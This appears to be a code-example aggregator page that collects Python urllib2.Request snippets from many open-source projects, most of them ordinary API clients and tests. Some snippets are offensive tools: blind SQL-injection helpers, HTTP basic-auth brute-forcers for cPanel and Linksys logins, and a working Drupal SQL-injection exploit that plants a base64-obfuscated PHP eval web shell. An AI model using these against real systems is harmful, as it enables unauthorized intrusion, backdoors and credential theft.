python类Request()的实例源码

STFDevicesControl.py 文件源码 项目:PhonePerformanceMeasure 作者: KyleCe 项目源码 文件源码 阅读 34 收藏 0 点赞 0 评论 0
def add_user_devices(self, serial):
        # (url, access_token, api_token) = self.get_api_conf()
        api_url = self.url + "/api/v1/user/devices"
        token = self.access_token + " " + self.api_token

        data = {'serial': serial}
        request = urllib2.Request(api_url, json.dumps(data))
        request.add_header('Authorization', token)
        request.add_header('Content-Type', 'application/json')
        try:
            urllib2.urlopen(request)
        except Exception, e:
            print e.code
            print e.read()

    # ?????????
STFDevicesControl.py 文件源码 项目:PhonePerformanceMeasure 作者: KyleCe 项目源码 文件源码 阅读 33 收藏 0 点赞 0 评论 0
def remove_devices_user(self, device_list):
        # (url, access_token, api_token) = self.get_api_conf("conf/stf.conf", "renguoliang")
        for device in device_list:
            serial = device["serial"]
            api_url = self.url + "/api/v1/user/devices/%s" % serial
            print api_url
            token = self.access_token + " " + self.api_token
            request = urllib2.Request(api_url)
            request.add_header('Authorization', token)
            request.get_method = lambda: 'DELETE'
            try:
                urllib2.urlopen(request)
            except Exception, e:
                print e.code
                print e.read()

    # ?????????
hippo.py 文件源码 项目:Cortex-Analyzers 作者: CERT-BDF 项目源码 文件源码 阅读 30 收藏 0 点赞 0 评论 0
def run(self):
        data = self.getData()

        value = {
            data: {
                "type": self.data_type
            }
        }
        json_data = json.dumps(value)
        post_data = json_data.encode('utf-8')
        headers = {'Content-Type': 'application/json'}

        try:
            request = urllib2.Request('{}/hippocampe/api/v1.0/{}'.format(self.url, self.service), post_data, headers)
            response = urllib2.urlopen(request)
            report = json.loads(response.read())

            self.report(report)
        except urllib2.HTTPError:
            self.error("Hippocampe: " + str(sys.exc_info()[1]))
        except urllib2.URLError:
            self.error("Hippocampe: service is not available")
        except Exception as e:
            self.unexpectedError(e)
tools.py 文件源码 项目:mongoaudit 作者: Exploit-install 项目源码 文件源码 阅读 35 收藏 0 点赞 0 评论 0
def send_result(email, result, title, urn):
    """
    Args:
        email (str): address to send the results
        result (obj): results to send
        title (str):
        urn (str): uniform resource name
    Returns:
        str: response from endpoint
    """
    url = 'https://mongoaud.it/results'
    headers = {'Content-type': 'application/json',
               'Accept': 'application/json'}
    values = {'email': email, 'result': result, 'title': title, 'urn': urn, 'date': get_date()}
    try:
        req = urllib2.Request(url, json.dumps(values), headers)
        response = urllib2.urlopen(req)
        return response.read()
    except (urllib2.HTTPError, urllib2.URLError) as exc:
        return "Sadly enough, we are having technical difficulties at the moment, " \
               "please try again later.\n\n%s" % str(exc)
test_glance.py 文件源码 项目:os-xenapi 作者: openstack 项目源码 文件源码 阅读 31 收藏 0 点赞 0 评论 0
def test_download_and_verify_ok(self, mock_urlopen):
        mock_extract_tarball = self.mock_patch_object(
            self.glance.utils, 'extract_tarball')
        mock_md5 = mock.Mock()
        mock_md5.hexdigest.return_value = 'expect_cksum'
        mock_md5_new = self.mock_patch_object(
            self.glance.md5, 'new', mock_md5)
        mock_info = mock.Mock()
        mock_info.getheader.return_value = 'expect_cksum'
        mock_urlopen.return_value.info.return_value = mock_info
        fake_request = urllib2.Request('http://fakeurl.com')

        self.glance._download_tarball_and_verify(
            fake_request, 'fake_staging_path')
        mock_urlopen.assert_called_with(fake_request)
        mock_extract_tarball.assert_called_once()
        mock_md5_new.assert_called_once()
        mock_info.getheader.assert_called_once()
        mock_md5_new.return_value.hexdigest.assert_called_once()
test_glance.py 文件源码 项目:os-xenapi 作者: openstack 项目源码 文件源码 阅读 26 收藏 0 点赞 0 评论 0
def test_download_ok_verify_failed(self, mock_urlopen):
        mock_extract_tarball = self.mock_patch_object(
            self.glance.utils, 'extract_tarball')
        mock_md5 = mock.Mock()
        mock_md5.hexdigest.return_value = 'unexpect_cksum'
        mock_md5_new = self.mock_patch_object(
            self.glance.md5, 'new', mock_md5)
        mock_info = mock.Mock()
        mock_info.getheader.return_value = 'expect_cksum'
        mock_urlopen.return_value.info.return_value = mock_info
        fake_request = urllib2.Request('http://fakeurl.com')

        self.assertRaises(self.glance.RetryableError,
                          self.glance._download_tarball_and_verify,
                          fake_request, 'fake_staging_path'
                          )
        mock_urlopen.assert_called_with(fake_request)
        mock_extract_tarball.assert_called_once()
        mock_md5_new.assert_called_once()
        mock_md5_new.return_value.hexdigest.assert_called_once()
recipe-577909.py 文件源码 项目:code 作者: ActiveState 项目源码 文件源码 阅读 24 收藏 0 点赞 0 评论 0
def update(self, docs, commitwithin=None):
        """Post list of docs to Solr, return URL and status.
        Opptionall tell Solr to "commitwithin" that many milliseconds."""
        url = self.url + '/update'
        add_xml = etree.Element('add')
        if commitwithin is not None:
            add_xml.set('commitWithin', str(commitwithin))
        for doc in docs:
            xdoc = etree.SubElement(add_xml, 'doc')
            for key, value in doc.iteritems():
                if value:
                    field = etree.Element('field', name=key)
                    field.text = (value if isinstance(value, unicode)
                                  else str(value))
                    xdoc.append(field)
        request = urllib2.Request(url)
        request.add_header('Content-Type', 'text/xml; charset=utf-8')
        request.add_data(etree.tostring(add_xml, pretty_print=True))
        response = urllib2.urlopen(request).read()
        status = etree.XML(response).findtext('lst/int')
        return url, status
scraper.py 文件源码 项目:pi_romulus 作者: ArthurMoore85 项目源码 文件源码 阅读 30 收藏 0 点赞 0 评论 0
def _html_link_return(self, url, tag, key, value, deeper=False, second=False):
        """
        Returns links
        :param url: URL to filter
        :param key: Name of key to search in tag
        :param tag: Name of value to find
        :param value: Name of the value expected in tag
        """
        if url[0] == '/':
            url = '{0}{1}'.format(self.url, url)
        r = urllib2.Request(url)
        response = urllib2.urlopen(r)
        soup = BeautifulSoup(response, 'html.parser')
        matches = soup.findAll(tag, {key, value})
        if deeper:
            m = matches[0]
            matches = m.findAll('a')[0]['href']
        elif second:
            m = matches[0]
            matches = m.findAll('a')[1]['href']
            print m.findAll('a')
        else:
            matches = matches[0]['href']
        return '{0}{1}'.format(self.url, matches)
distnet.py 文件源码 项目:SoCFoundationFlow 作者: mattaw 项目源码 文件源码 阅读 34 收藏 0 点赞 0 评论 0
def execute(self):
        if hasattr(Context.g_module, 'publish'):
            Context.Context.execute(self)
        mod = Context.g_module

        rfile = getattr(self, 'rfile', send_package_name())
        if not os.path.isfile(rfile):
            self.fatal('Create the release file with "waf release" first! %r' % rfile)

        fdata = Utils.readf(rfile, m='rb')
        data = safe_urlencode([('pkgdata', fdata), ('pkgname', mod.APPNAME), ('pkgver', mod.VERSION)])

        req = Request(get_upload_url(), data)
        response = urlopen(req, timeout=TIMEOUT)
        data = response.read().strip()

        if sys.hexversion>0x300000f:
            data = data.decode('utf-8')

        if data != 'ok':
            self.fatal('Could not publish the package %r' % data)
distnet.py 文件源码 项目:SoCFoundationFlow 作者: mattaw 项目源码 文件源码 阅读 29 收藏 0 点赞 0 评论 0
def compute_dependencies(self, filename=REQUIRES):
        text = Utils.readf(filename)
        data = safe_urlencode([('text', text)])

        if '--offline' in sys.argv:
            self.constraints = self.local_resolve(text)
        else:
            req = Request(get_resolve_url(), data)
            try:
                response = urlopen(req, timeout=TIMEOUT)
            except URLError as e:
                Logs.warn('The package server is down! %r' % e)
                self.constraints = self.local_resolve(text)
            else:
                ret = response.read()
                try:
                    ret = ret.decode('utf-8')
                except Exception:
                    pass
                self.trace(ret)
                self.constraints = parse_constraints(ret)
        self.check_errors()
distnet.py 文件源码 项目:SoCFoundationFlow 作者: mattaw 项目源码 文件源码 阅读 27 收藏 0 点赞 0 评论 0
def execute(self):
        if hasattr(Context.g_module, 'publish'):
            Context.Context.execute(self)
        mod = Context.g_module

        rfile = getattr(self, 'rfile', send_package_name())
        if not os.path.isfile(rfile):
            self.fatal('Create the release file with "waf release" first! %r' % rfile)

        fdata = Utils.readf(rfile, m='rb')
        data = safe_urlencode([('pkgdata', fdata), ('pkgname', mod.APPNAME), ('pkgver', mod.VERSION)])

        req = Request(get_upload_url(), data)
        response = urlopen(req, timeout=TIMEOUT)
        data = response.read().strip()

        if sys.hexversion>0x300000f:
            data = data.decode('utf-8')

        if data != 'ok':
            self.fatal('Could not publish the package %r' % data)
distnet.py 文件源码 项目:SoCFoundationFlow 作者: mattaw 项目源码 文件源码 阅读 32 收藏 0 点赞 0 评论 0
def compute_dependencies(self, filename=REQUIRES):
        text = Utils.readf(filename)
        data = safe_urlencode([('text', text)])

        if '--offline' in sys.argv:
            self.constraints = self.local_resolve(text)
        else:
            req = Request(get_resolve_url(), data)
            try:
                response = urlopen(req, timeout=TIMEOUT)
            except URLError as e:
                Logs.warn('The package server is down! %r' % e)
                self.constraints = self.local_resolve(text)
            else:
                ret = response.read()
                try:
                    ret = ret.decode('utf-8')
                except Exception:
                    pass
                self.trace(ret)
                self.constraints = parse_constraints(ret)
        self.check_errors()
distnet.py 文件源码 项目:SoCFoundationFlow 作者: mattaw 项目源码 文件源码 阅读 31 收藏 0 点赞 0 评论 0
def execute(self):
        if hasattr(Context.g_module, 'publish'):
            Context.Context.execute(self)
        mod = Context.g_module

        rfile = getattr(self, 'rfile', send_package_name())
        if not os.path.isfile(rfile):
            self.fatal('Create the release file with "waf release" first! %r' % rfile)

        fdata = Utils.readf(rfile, m='rb')
        data = safe_urlencode([('pkgdata', fdata), ('pkgname', mod.APPNAME), ('pkgver', mod.VERSION)])

        req = Request(get_upload_url(), data)
        response = urlopen(req, timeout=TIMEOUT)
        data = response.read().strip()

        if sys.hexversion>0x300000f:
            data = data.decode('utf-8')

        if data != 'ok':
            self.fatal('Could not publish the package %r' % data)
gather.py 文件源码 项目:SPF 作者: Exploit-install 项目源码 文件源码 阅读 27 收藏 0 点赞 0 评论 0
def search(self, url, offset=1, maxoffset=0, title=""):
        current_offset = 0
        data = ""
        self.p.reset(title=title)
        while current_offset <= maxoffset:
            self.p.rotate()
            temp_url = re.sub(r'\[\[OFFSET\]\]', str(current_offset), url)
            try:
                headers = { 'User-Agent' : self.user_agent }
                req = urllib2.Request(temp_url, None, headers)
                data += urllib2.urlopen(req).read()
            except urllib2.URLError as e:
                self.display.error("Could not access [%s]" % (title))
                return data
            except Exception as e:
                print e
            current_offset += offset
        self.p.done()
        return data
trakt.py 文件源码 项目:plex-trakt-scrobbler 作者: cristianmiranda 项目源码 文件源码 阅读 26 收藏 0 点赞 0 评论 0
def _do_trakt_auth_post(self, url, data):
        try:
            session = self.get_session()

            headers = {
                'Content-Type': 'application/json',
                'Authorization': 'Bearer ' + session,
                'trakt-api-version': '2',
                'trakt-api-key': self.CLIENT_ID
            }

            # timeout in seconds
            timeout = 5
            socket.setdefaulttimeout(timeout)

            request = urllib2.Request(url, data, headers)
            response = urllib2.urlopen(request).read()

            self.logger.info('Response: {0}'.format(response))
            return response
        except urllib2.HTTPError as e:
            self.logger.error('Unable to submit post data {url} - {error}'.format(url=url, error=e.reason))
            raise
darkTouch.py 文件源码 项目:darkc0de-old-stuff 作者: tuwid 项目源码 文件源码 阅读 33 收藏 0 点赞 0 评论 0
def pContent(url):
        try:
                request_web = urllib2.Request(url);agent = 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)'
                request_web.add_header('User-Agent', agent);opener_web = urllib2.build_opener()
                text = opener_web.open(request_web).read();strreg = re.compile('(?<=href=")(.*?)(?=")')
                names = strreg.findall(text);opener_web.close()
                for name in names:
            if site in name or '=' in name or name.startswith('/'):
                global collected
                collected.append(name)
            elif site in name and EXT in name:
                collected.append(name)
            elif 'http://' in name:
                collected.append(name)
    except:
        pass
darkMySQLi.py 文件源码 项目:darkc0de-old-stuff 作者: tuwid 项目源码 文件源码 阅读 31 收藏 0 点赞 0 评论 0
def GetThatShit(head_URL):
        source = ""
        global gets;global proxy_num
        head_URL = head_URL.replace("+",arg_eva)
        request_web = urllib2.Request(head_URL)
        request_web.add_header('User-Agent',agent)
        while len(source) < 1:
                if arg_debug == "on":
                        print "\n[proxy]:",proxy_list_count[proxy_num % proxy_len]+"\n[agent]:",agent+"\n[debug]:",head_URL,"\n"
                try:
                        gets+=1;proxy_num+=1
                        source = proxy_list[proxy_num % proxy_len].open(request_web).read()
                except (KeyboardInterrupt, SystemExit):
                        raise
                except (urllib2.HTTPError):
                        print "[-] Unexpected error:", sys.exc_info()[0],"\n[-] Trying again!"
                        print "[proxy]:",proxy_list_count[proxy_num % proxy_len]+"\n[agent]:",agent+"\n[debug]:",head_URL,"\n"
                        break
                except:
                        print "[-] Unexpected error:", sys.exc_info()[0],"\n[-] Look at the error and try to figure it out!"
                        print "[proxy]:",proxy_list_count[proxy_num % proxy_len]+"\n[agent]:",agent+"\n[debug]:",head_URL,"\n"
                        raise
        return source

#the guts and glory - Binary Algorithim that does all the guessing for the Blind Methodology
darkPGSQLi.py 文件源码 项目:darkc0de-old-stuff 作者: tuwid 项目源码 文件源码 阅读 27 收藏 0 点赞 0 评论 0
def GetThatShit(head_URL):
        source = ""
        global gets;global proxy_num
        head_URL = head_URL.replace("+",arg_eva)
        request_web = urllib2.Request(head_URL)
        request_web.add_header('User-Agent',agent)
        while len(source) < 1:
                if arg_debug == "on":
                        print "\n[proxy]:",proxy_list_count[proxy_num % proxy_len]+"\n[agent]:",agent+"\n[debug]:",head_URL,"\n"
                try:
                        gets+=1;proxy_num+=1
                        source = proxy_list[proxy_num % proxy_len].open(request_web).read()
                except (KeyboardInterrupt, SystemExit):
                        raise
                except (urllib2.HTTPError):
                        print "[-] Unexpected error:", sys.exc_info()[0],"\n[-] Trying again!"
                        print "[proxy]:",proxy_list_count[proxy_num % proxy_len]+"\n[agent]:",agent+"\n[debug]:",head_URL,"\n"
                        break
                except:
                        print "[-] Unexpected error:", sys.exc_info()[0],"\n[-] Look at the error and try to figure it out!"
                        print "[proxy]:",proxy_list_count[proxy_num % proxy_len]+"\n[agent]:",agent+"\n[debug]:",head_URL,"\n"
                        raise
        return source

#say hello
cPanelbrute.py 文件源码 项目:darkc0de-old-stuff 作者: tuwid 项目源码 文件源码 阅读 28 收藏 0 点赞 0 评论 0
def getauth(url):

    req = urllib2.Request(url)
    try:
            handle = urllib2.urlopen(req)
    except IOError, e:               
            pass
    else:                               
            print "This page isn't protected by basic authentication.\n"
            sys.exit(1)

    if not hasattr(e, 'code') or e.code != 401:                 
            print "\nThis page isn't protected by basic authentication."
            print 'But we failed for another reason.\n'
            sys.exit(1)

    authline = e.headers.get('www-authenticate', '')    

    if not authline:
            print '\nA 401 error without a basic authentication response header - very weird.\n'
            sys.exit(1)
    else:
        return authline
linksysbrute.py 文件源码 项目:darkc0de-old-stuff 作者: tuwid 项目源码 文件源码 阅读 36 收藏 0 点赞 0 评论 0
def run(self):
        password = getword()
        try:
            print "-"*12
            print "User:",username,"Password:",password
            req = urllib2.Request(sys.argv[1])
            passman = urllib2.HTTPPasswordMgrWithDefaultRealm()
            passman.add_password(None, sys.argv[1], username, password)
            authhandler = urllib2.HTTPBasicAuthHandler(passman)
            opener = urllib2.build_opener(authhandler)
            fd = opener.open(req)
            print "\t\n\n[+] Login successful: Username:",username,"Password:",password,"\n"            
            print "[+] Retrieved", fd.geturl()
            info = fd.info()
            for key, value in info.items():
                    print "%s = %s" % (key, value)
            sys.exit(2)
        except (urllib2.HTTPError,socket.error):
            pass
webauthbrute.py 文件源码 项目:darkc0de-old-stuff 作者: tuwid 项目源码 文件源码 阅读 38 收藏 0 点赞 0 评论 0
def getauth(url):

    req = urllib2.Request(url)
    try:
            handle = urllib2.urlopen(req)
    except IOError, e:                  
            pass
    else:                               
            print "This page isn't protected by basic authentication.\n"
            sys.exit(1)

    if not hasattr(e, 'code') or e.code != 401:                 
            print "\nThis page isn't protected by basic authentication."
            print 'But we failed for another reason.\n'
            sys.exit(1)

    authline = e.headers.get('www-authenticate', '')    

    if not authline:
            print '\nA 401 error without an basic authentication response header - very weird.\n'
            sys.exit(1)
    else:
        return authline
webauthbrute.py 文件源码 项目:darkc0de-old-stuff 作者: tuwid 项目源码 文件源码 阅读 31 收藏 0 点赞 0 评论 0
def run(self):
        username, password = getword()
        try:
            print "-"*12
            print "User:",username,"Password:",password
            req = urllib2.Request(sys.argv[1])
            passman = urllib2.HTTPPasswordMgrWithDefaultRealm()
            passman.add_password(None, sys.argv[1], username, password)
            authhandler = urllib2.HTTPBasicAuthHandler(passman)
            opener = urllib2.build_opener(authhandler)
            fd = opener.open(req)
            print "\t\n\nUsername:",username,"Password:",password,"----- Login successful!!!\n\n"           
            print "Retrieved", fd.geturl()
            info = fd.info()
            for key, value in info.items():
                    print "%s = %s" % (key, value)
            sys.exit(2)
        except (urllib2.HTTPError, httplib.BadStatusLine,socket.error), msg: 
            print "An error occurred:", msg
            pass
springenwerk.py 文件源码 项目:darkc0de-old-stuff 作者: tuwid 项目源码 文件源码 阅读 28 收藏 0 点赞 0 评论 0
def getURLContents(self, url, data=None):    
        "Returns the contents of the given URL as an Unicode string" 

        s = ""
        success = False

        req = Request(url, data, {'User-agent': self.useragent})

        try:
            f = urlopen(req)  
            s = f.read()
            f.close()
            success = True
        except HTTPError, e:
            print 'Server error: ', e.code
            if (self.verbose and BaseHTTPRequestHandler.responses.has_key(e.code)):
                title, msg = BaseHTTPRequestHandler.responses[e.code]            
                print title + ": " + msg
        except URLError, e:
            print 'Connection error: ', e.reason

        dammit = UnicodeDammit(s)    

        return (success, dammit.unicode)
AfricasTalkingGateway.py 文件源码 项目:Twitter-Sentiment-Analysis 作者: crakama 项目源码 文件源码 阅读 24 收藏 0 点赞 0 评论 0
def sendRequest(self, urlString, data_ = None):
        try:
            if data_ is not None:
                data = urllib.urlencode(data_)
                request = urllib2.Request(urlString, data, headers = self.headers)
            else:
                request = urllib2.Request(urlString, headers = self.headers)

            response = urllib2.urlopen(request)
        except Exception as e:
            raise AfricasTalkingGatewayException(str(e))
        else:
            self.responseCode = response.getcode()
            response = response.read()
            if self.Debug:
                print response
            return response
AfricasTalkingGateway.py 文件源码 项目:Twitter-Sentiment-Analysis 作者: crakama 项目源码 文件源码 阅读 27 收藏 0 点赞 0 评论 0
def sendRequest(self, urlString, data_ = None):
        try:
            if data_ is not None:
                data = urllib.urlencode(data_)
                request = urllib2.Request(urlString, data, headers = self.headers)
            else:
                request = urllib2.Request(urlString, headers = self.headers)

            response = urllib2.urlopen(request)
        except Exception as e:
            raise AfricasTalkingGatewayException(str(e))
        else:
            self.responseCode = response.getcode()
            response = response.read()
            if self.Debug:
                print response
            return response
__init__.py 文件源码 项目:Tinychat-Bot--Discontinued 作者: Tinychat 项目源码 文件源码 阅读 31 收藏 0 点赞 0 评论 0
def getAMFRequest(self, requests):
        """
        Builds an AMF request {LEnvelope<pyamf.remoting.Envelope>} from a
        supplied list of requests.
        """
        envelope = remoting.Envelope(self.amf_version)

        if self.logger:
            self.logger.debug('AMF version: %s' % self.amf_version)

        for request in requests:
            service = request.service
            args = list(request.args)

            envelope[request.id] = remoting.Request(str(service), args)

        envelope.headers = self.headers

        return envelope
def exploit(cls, args):
        url = args['options']['target']
        webshell_url = url + '/?q=<?php%20eval(base64_decode(ZXZhbCgkX1BPU1RbZV0pOw));?>'
        payload = "name[0;insert into menu_router (path,  page_callback, access_callback, " \
                  "include_file, load_functions, to_arg_functions, description) values ('<" \
                  "?php eval(base64_decode(ZXZhbCgkX1BPU1RbZV0pOw));?>','php_eval', '1', '" \
                  "modules/php/php.module', '', '', '');#]=test&name[0]=test2&pass=test&fo" \
                  "rm_id=user_login_block"

        if args['options']['verbose']:
            print '[*] Request URL: ' + url
            print '[*] POST Content: ' + payload

        urllib2.urlopen(url, data=payload)
        request = urllib2.Request(webshell_url, data="e=echo strrev(gwesdvjvncqwdijqiwdqwduhq);")
        response = urllib2.urlopen(request).read()

        if 'gwesdvjvncqwdijqiwdqwduhq'[::-1] in response:
            args['success'] = True
            args['poc_ret']['vul_url'] = url
            args['poc_ret']['Webshell'] = webshell_url
            args['poc_ret']['Webshell_PWD'] = 'e'
            return args
        args['success'] = False
        return args
common.py 文件源码 项目:malware 作者: JustF0rWork 项目源码 文件源码 阅读 26 收藏 0 点赞 0 评论 0
def retrieve_content(url, data=None):
    """
    Retrieves page content from given URL
    """

    try:
        req = urllib2.Request("".join(url[i].replace(' ', "%20") if i > url.find('?') else url[i] for i in xrange(len(url))), data, {"User-agent": NAME, "Accept-encoding": "gzip, deflate"})
        resp = urllib2.urlopen(req, timeout=TIMEOUT)
        retval = resp.read()
        encoding = resp.headers.get("Content-Encoding")

        if encoding:
            if encoding.lower() == "deflate":
                data = StringIO.StringIO(zlib.decompress(retval, -15))
            else:
                data = gzip.GzipFile("", "rb", 9, StringIO.StringIO(retval))
            retval = data.read()
    except Exception, ex:
        retval = ex.read() if hasattr(ex, "read") else getattr(ex, "msg", str())

    return retval or ""
rest_client.py 文件源码 项目:networking-bigswitch-l3-pe 作者: DeNADev 项目源码 文件源码 阅读 27 收藏 0 点赞 0 评论 0
def _rest_request(self, url, data, session, verb):
        headers = {'Content-type': 'application/json'}
        if session:
            headers["Cookie"] = "session_cookie=%s" % session
        LOG.debug("verb:%(verb)s url:%(url)s "
                  "headers:%(headers)s data:%(data)s", {
                      'verb': verb, 'url': url,
                      'headers': headers, 'data': data})
        request = urllib2.Request(url, data, headers)
        request.get_method = lambda: verb
        response = urllib2.urlopen(request)
        code = response.code
        result = response.read()
        log_result = result
        if len(result) > LOG_STRING_LEN:
            log_result = result.replace("\n", "")[:LOG_STRING_LEN] + " ..."
        LOG.debug("code:%(code)s result:%(result)s",
                  {'code': code, 'result': log_result})
        if code not in range(200, 300):
            raise BCFRestError(code=code, result=result,
                               method=verb, url=url, data=data)
        return (code, result)
checkpoint.py 文件源码 项目:instagram_private_api 作者: ping 项目源码 文件源码 阅读 37 收藏 0 点赞 0 评论 0
def respond_to_checkpoint(self, response_code):
        headers = {
            'User-Agent': self.USER_AGENT,
            'Origin': 'https://i.instagram.com',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Accept-Language': 'en-US',
            'Accept-Encoding': 'gzip',
            'Referer': self.endpoint,
            'Cookie': self.cookie,
        }

        req = Request(self.endpoint, headers=headers)
        data = {'csrfmiddlewaretoken': self.csrftoken, 'response_code': response_code}
        res = urlopen(req, data=urlencode(data).encode('ascii'), timeout=self.timeout)

        if res.info().get('Content-Encoding') == 'gzip':
            buf = BytesIO(res.read())
            content = gzip.GzipFile(fileobj=buf).read().decode('utf-8')
        else:
            content = res.read().decode('utf-8')

        return res.code, content


问题


面经


文章

微信
公众号

扫码关注公众号